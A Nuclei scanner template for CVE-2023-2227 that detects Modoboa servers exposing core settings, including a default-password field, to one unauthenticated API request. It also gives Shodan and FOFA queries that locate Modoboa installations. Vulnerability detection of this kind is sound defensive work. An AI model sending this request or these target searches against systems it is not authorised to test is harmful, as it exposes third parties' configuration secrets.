# Nuclei template for CVE-2023-2227: Modoboa core parameters readable without authentication.
id: CVE-2023-2227

info:
  name: Modoboa < 2.1.0 - Improper Authorization
  author: ritikchaddha,princechaddha
  severity: critical
  description: |
    Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.
  reference:
    - https://huntr.com/bounties/351f9055-2008-4af0-b820-01ff66678bf3
    - https://github.com/modoboa/modoboa/commit/7bcd3f6eb264d4e3e01071c97c2bac51cdd6fe97
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2227
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2023-2227
    cwe-id: CWE-285
    epss-score: 0.01292
    epss-percentile: 0.85804
    # Quoted: the value contains '*' characters, which are alias sigils in YAML when they lead a scalar.
    cpe: 'cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:*'
  metadata:
    # One request per target; nothing is mutated on the host.
    max-request: 1
    vendor: modoboa
    product: modoboa
    # Search-engine queries are single-quoted throughout so the embedded double quotes stay literal.
    shodan-query:
      - 'http.favicon.hash:1949005079'
      - 'http.html:"modoboa"'
    fofa-query:
      - 'body="Modoboa"'
      - 'body="modoboa"'
      - 'icon_hash=1949005079'
  tags: cve,cve2023,modoboa,exposure,disclosure

http:
  # A single unauthenticated GET: no Authorization header or session cookie is sent,
  # so a 200 JSON response with the fields below means the core settings are exposed.
  # The fixed User-Agent value is a grep-able indicator for this check in web-server logs.
  - raw:
      - |
        GET /api/v2/parameters/core/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: 7h3h4ckv157

    # Every matcher below must hit (matchers-condition: and) before the target is reported.
    matchers-condition: and
    matchers:
      # All three JSON fragments are required together (condition: and); the
      # 'default_password' key in an unauthenticated reply is the disclosure being detected.
      - type: word
        part: body
        words:
          - 'label":'
          - 'default_password":'
          - 'authentication_type":"local'
        condition: and

      # Guards against HTML error/login pages that happen to echo the words above.
      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# Template signature; it covers the content above, so whitespace or quoting changes
# presumably need the digest to be regenerated by the template-signing step — confirm.
# digest: 4b0a00483046022100b7d83db7d46a24d08eec0c032ad6c29a7a7494a213f3e776a07822b39ec60d36022100a8f268ac9f2e5148f379aca1009ae0eef306dbf32483549bf1e6a945f901514b:922c64590222798bb761d5b6d8e72950